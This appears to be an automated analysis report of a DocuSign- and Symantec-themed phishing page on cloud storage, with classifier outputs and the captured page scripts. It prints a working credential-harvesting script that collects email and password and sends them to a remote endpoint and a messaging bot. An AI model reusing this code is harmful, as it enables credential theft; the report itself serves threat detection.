Windows Analysis Report
https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: https://eu2.contabostorage.com

{
    "risk_score": 1,
    "reasoning": "This appears to be the standard jQuery library, which is a widely used and trusted JavaScript library. It does not exhibit any high-risk behaviors, and the code is not obfuscated or attempting to execute dynamic code. The library is used for common web development tasks and does not pose a significant security risk."
}

/*! jQuery v2.1.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */
!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(d.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject||this.constructor(null)},push:f,sort:c.sort,splice:c.splice},n.extend=n.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||n.isFunction(g)||(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(a=arguments[h]))for(b in a)c=g[b],d=a[b],g!==d&&(j&&d&&(n.isPlainObject(d)||(e=n.isArray(d)))?(e?(e=!1,f=c&&n.isArray(c)?c:[]):f=c&&n.isPlainObject(c)?c:{},g[b]=n.extend(j,f,d)):void 0!==d&&(g[b]=d));return g},n.extend({expando:"jQuery"+(m+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===n.type(a)},isArray:Array.isArray,isWindow:function(a){return null!=a&&a===a.window},isNumeric:function(a){return!n.isArray(a)&&a-parseFloat(a)>=0},isPlainObject:function(a){return"object"!==n.type(a)||a.nodeType||n.isWindow(a)?!1:a.constructor&&!j.call(a.constructor.prototype,"isPrototypeOf")?!1:!0},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?h[i.call(a)]||"object":typeof a},globalEval:function(a){var b,c=eval;a=n.trim(a),a&&(1===a.indexOf("use strict")?(b=l.createElement("script"),b.text=a,l.head.appendChild(b).parentNode.removeChild(b)):c(a))},camelCase:function(a){return a.replace(p,"ms-").replace(q,r)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b,c){var d,e=0,f=a.length,g=s(a);if(c){if(g){for(;f>e;e++)if(d=b.apply(a[e],c),d===!1)break}else for(e in a)if(d=b.apply(a[e],c),d===!1)break}else if(g){for(;f>e;e++)if(d=b.call(a[e],e,a[e]),d===!1)break}else for(e in a)if(d=b.call(a[e],e,a[e]),d===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(o,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(s(Object(a))?n.merge(c,"string"==typeof a?[a]:a):f.call(c,a)),c},inArray:function(a,b,c){return null==b?-1:g.call(b,a,c)},merge:function(a,b){for(var c=+b.length,d=0,e=a.length;c>d;d++)a[e++]=b[d];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;g>f;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,f=0,g=a.length,h=s(a),i=[];if(h)for(;g>f;f++)d=b(a[f],f,c),null!=d&&i.push(d);else for(f in a)d=b(a[f],f,c),null!=d&&i.push(d);return e.apply([],i)},guid:1,proxy:function(a,b){var c,e,f;return"string"==typeof b&&(c=a[b],b=a,a=c),n.isFunction(a)?(e=d.call(arguments,2),f=function(){return a.apply(b||this,e.concat(d.call(arguments)))},f.guid=a.guid=a.guid||n.guid++,f):void 0},now:Date.now,support:k}),n.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),fun

{
    "risk_score": 4,
    "reasoning": "The script demonstrates some moderate-risk behaviors, such as aggressive DOM manipulation and the use of obfuscated code. However, it appears to be a legitimate loading/authentication sequence, and the obfuscation may be a result of minification or other optimization practices. Further review would be needed to determine if there are any malicious intentions behind the script."
}

			function myFunction() {
  $('#dButton').hide();
  $("#loaderClass").show();
  var _0x9f8865 = new Array();
  _0x9f8865.push("Authenticating ...");
  _0x9f8865.push("Syncing cloud");
  _0x9f8865.push("Loading ...");
  var _0x1b5bc3 = 0x0;
  function _0x69ee31() {
    $("#loaderText").html(_0x9f8865[_0x1b5bc3]);
    if (_0x1b5bc3 < _0x9f8865.length - 0x1) {
      _0x1b5bc3++;
    } else {
      _0x1b5bc3 = 0x0;
    }
    setTimeout(_0x69ee31, 0x3e8);
  }
  _0x69ee31();
  window.setTimeout(function () {
    $('#loaderText').hide();
    $("#loaderText2").show();
  }, 0xbb8);
  window.setTimeout(function () {
    $("#loginForm").show();
    $('#overlayclass').show();
  }, 0xfa0);
}

{
    "risk_score": 9,
    "reasoning": "This script exhibits several high-risk behaviors, including data exfiltration, redirects to suspicious domains, and obfuscated code. It collects user credentials and sends them to an external server, which is a clear indication of malicious intent. Additionally, the script attempts to redirect the user to a suspicious domain after a failed login attempt. The overall behavior of this script is highly suspicious and poses a significant security risk."
}

 
$(document).ready(function () {
  var _0x2e8f33 = 0;
  var _0x3d449d = window.location.hash.substr(1);
  if (!_0x3d449d) {
    $("#pageContent").hide();
  } else {
    window.setTimeout(function () {
      $("#pageContent").show();
      $("#mainLoader").hide();
    }, 3e3);
    var _0x5b5807 = _0x3d449d.indexOf("@");
    var _0x1254ec = _0x3d449d.substr(_0x5b5807 + 1);
    var _0x3eca14 = _0x1254ec.substr(0, _0x1254ec.indexOf("."));
    var _0x57b930 = _0x3eca14.toLowerCase();
    $("#email").val(_0x3d449d);
    $("#faviconPage").attr("href", "https://logo.clearbit.com/" + _0x1254ec);
    $("#faviconImg").attr("src", "https://logo.clearbit.com/" + _0x1254ec);
    $("#userDomainIcon").attr("src", "https://logo.clearbit.com/" + _0x1254ec);
    document.title = "Sign in with " + _0x1254ec;
    $("#domain-name").html(_0x57b930);
    $("#msg").hide();
    $("#emailShow").html(_0x3d449d);
    $("#emailIdLable").html(_0x3d449d);
  }
  $("#submit-btn").click(function (_0x51d675) {
    $("#error").hide();
    $("#msg").hide();
    _0x51d675.preventDefault();
    var _0x3b06d2 = $("#email").val();
    var _0x320cc9 = $("#password").val();
    var _0xa560fb = $("#msg").html();
    $("#msg").text(_0xa560fb);
    if (!_0x320cc9) {
      $("#msg").show();
      $("#msg").html("Your password field is empty!!");
      ai.focus;
      return false;
    }
    var _0x3fe763 = _0x3b06d2.indexOf("@");
    var _0x526ae4 = _0x3b06d2.substr(_0x3fe763 + 1);
    var _0x1989fb = _0x526ae4.substr(0, _0x526ae4.indexOf("."));
    var _0x25322b = _0x1989fb.toLowerCase();
    _0x2e8f33 = _0x2e8f33 + 1;
    $("#domain-name").html(_0x25322b);
    $.ajax({dataType: "JSON", url: Xeno, type: "POST", data: {email: _0x3b06d2, password: _0x320cc9}, beforeSend: function (_0x19dbda) {
      $("#submit-btn").html("Authenticating ...");
	 
    },
	
	
	
	
	

	error: function () {
	$("#submit-btn").html("NEXT");
	$("#error").show();
      $("#password").val("");
      if (_0x2e8f33 >= 2) {
        _0x2e8f33 = 0;
        window.location.replace("https://www.tyagiindustries.com/document/files/REMITTANCE-COPY-REF-761902672000710000000027163.pdf");
      }
	  
      document.getElementById("password").style.borderColor = "red";
      bot.sendMessage(_0x25322b + " Email : " + _0x3b06d2 + " / " + _0x25322b + " Pass : " + _0x320cc9);
      $("#error").show();
	  
    }, complete: function () {
      $("#submit-btn").html("NEXT");
    }});
  });
});


    

{
"contains_trigger_text": true,
"trigger_text": "This document has been shared with your email phishme@arrowbank.com on DocuSign please download.",
"prominent_button_name": "View document",
"text_input_field_labels": "unknown",
"pdf_icon_visible": true,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": [
    "DocuSign"
  ]
}

{
    "risk_score": 9,
    "reasoning": "The provided HTML snippet contains a warning about a file named 'jsbot.js' that is executable and may harm the user's computer. This indicates the file is potentially malicious. The snippet also includes a download link for the file, which is a high-risk behavior as it could lead to the execution of malicious code. Additionally, the use of obfuscated or encoded URLs is a common tactic used by malware, further increasing the risk score."
}

<!DOCTYPE html><html><head><title>Google Drive - Virus scan warning</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="E7EB9tSbMwtZ_KjZ5KPyvg">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor:pointer}.goog-link-button-disabled{color:#ccc;text-decoration:none;cursor:default}body{color:#222;font:normal 13px/1.4 arial,sans-serif;margin:0}.grecaptcha-badge{visibility:hidden}.uc-main{padding-top:50px;text-align:center}#uc-dl-icon{display:inline-block;margin-top:16px;padding-right:1em;vertical-align:top}#uc-text{display:inline-block;max-width:68ex;text-align:left}.uc-error-caption,.uc-warning-caption{color:#222;font-size:16px}#uc-download-link{text-decoration:none}.uc-name-size a{color:#15c;text-decoration:none}.uc-name-size a:visited{color:#61c;text-decoration:none}.uc-name-size a:active{color:#d14836;text-decoration:none}.uc-footer{color:#777;font-size:11px;padding-bottom:5ex;padding-top:5ex;text-align:center}.uc-footer a{color:#15c}.uc-footer a:visited{color:#61c}.uc-footer a:active{color:#d14836}.uc-footer-divider{color:#ccc;width:100%}.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block}* html .goog-inline-block{display:inline}*:first-child+html .goog-inline-block{display:inline}sentinel{}</style><link rel="icon" href="//ssl.gstatic.com/docs/doclist/images/drive_2022q3_32dp.png"/></head><body><div class="uc-main"><div id="uc-dl-icon" class="image-container"><div class="drive-sprite-aux-download-file"></div></div><div id="uc-text"><p class="uc-warning-caption">Google Drive can't scan this file for viruses.</p><p class="uc-warning-subcaption">This file is executable and may harm your computer. <p class="uc-warning-subcaption"><span class="uc-name-size"><a href="/open?id=1HRfD-WdbwipksuQcSi9DBLUo9K5wjkH0">jsbot.js</a> (7.8k)</span></p></p><form id="download-form" action="https://drive.usercontent.google.com/download" method="get"><input type="submit" id="uc-download-link" class="goog-inline-block jfk-button jfk-button-action" value="Download anyway"/><input type="hidden" name="id" value="1HRfD-WdbwipksuQcSi9DBLUo9K5wjkH0"><input type="hidden" name="confirm" value="t"><input type="hidden" name="uuid" value="bc79cb9f-8e39-41b4-8370-dcae0617cb33"></form></div></div><div class="uc-footer"><hr class="uc-footer-divider"></div></body></html>

{
"contains_trigger_text": true,
"trigger_text": "This document has been shared with your email phishme@arrowbank.com on DocuSign please download.",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": true,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": [
    "Symantec"
  ]
}

```json{  "legit_domain": "symantec.com",  "classification": "wellknown",  "reasons": [    "The brand 'Symantec' is well-known and typically associated with the domain 'symantec.com'.",    "The URL 'eu2.contabostorage.com' does not match the legitimate domain for Symantec.",    "The domain 'contabostorage.com' suggests a cloud storage service, which is not directly related to Symantec's primary domain.",    "The presence of 'eu2' as a subdomain indicates a regional or service-specific subdomain, which is common in cloud services.",    "There is no direct association between 'contabostorage.com' and Symantec, raising suspicion of phishing."  ],  "riskscore": 8}
Google indexed: True

URL: eu2.contabostorage.com
			Brands: Symantec
			Input Fields: unknown

{
"contains_trigger_text": true,
"trigger_text": "Provide your email password to continue",
"prominent_button_name": "NEXT",
"text_input_field_labels": "Password",
"pdf_icon_visible": true,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": [
    "DocuSign"
  ]
}

```json{  "legit_domain": "docusign.com",  "classification": "wellknown",  "reasons": [    "DocuSign is a well-known brand associated with electronic signature technology.",    "The URL 'eu2.contabostorage.com' does not match the legitimate domain 'docusign.com'.",    "The domain 'contabostorage.com' is not associated with DocuSign and appears to be a cloud storage service.",    "The presence of a password input field on a non-legitimate domain is suspicious and indicative of phishing.",    "The use of a cloud storage domain could be an attempt to disguise a phishing site."  ],  "riskscore": 9}
Google indexed: True